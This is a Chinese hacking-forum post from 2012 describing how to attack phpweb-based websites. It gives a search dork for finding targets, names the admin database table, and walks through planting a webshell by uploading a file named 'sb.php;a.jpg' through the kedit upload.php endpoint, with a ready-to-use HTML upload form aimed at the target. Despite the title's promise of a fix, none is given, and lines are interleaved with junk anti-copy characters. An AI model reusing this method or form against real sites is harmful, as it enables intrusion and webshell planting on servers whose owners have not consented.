找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2088|回复: 0
打印 上一主题 下一主题

phpweb成品网站全版本通杀注入漏洞及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:52:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
关键字:inurl:webmall/detail.php?id6 ?: O% h! a. P. S+ d' H- |4 T
1 T2 P+ [1 |" u3 o' P5 M7 V3 b
数据表:pwn_base_admin) z4 }! B! `/ V' Y; [. h3 h) E% Y1 o
# L( `7 L0 y7 r! n* _/ z
关于拿shell
1 j# Z1 H4 `. }% U
' H9 s2 k5 r" o* J# Y% v' v首先登录后台admin.php
, L2 c& F1 o6 i" j& j- V& j
7 ?' y' ^& ^$ P) _* n看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。+ Q$ f$ F6 |0 m7 Q5 x! k
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg# P" n6 H7 H2 B- @
然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的8 K" ^  S5 j0 z! o) m4 ^0 x
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
( \+ T( K- H2 H# V4 @0 L0 B<input type="text" name="fileName" value="sb.php;a.jpg" />
6 @$ g) U) G5 S, L<input type="hidden" name="attachPath" value="news/pics/" /> ( n" Z1 s* x( B6 P/ p0 _* M
<input type="file" name="fileData" size="14" /></td>
# r% a% z. p# {) P0 F% S<input type="submit" name="button" value="确定" />
# ?1 K. f! x6 X; {( c, ~/ ]# d</form>9 A9 V. ^1 O  O7 G0 t( x' B

5 d) |" w9 W' {9 l) @' Z! B2 ]首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。) g2 n" G0 \" z$ t, O. H
7 r' v! o$ a' T4 K3 G# Q( u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表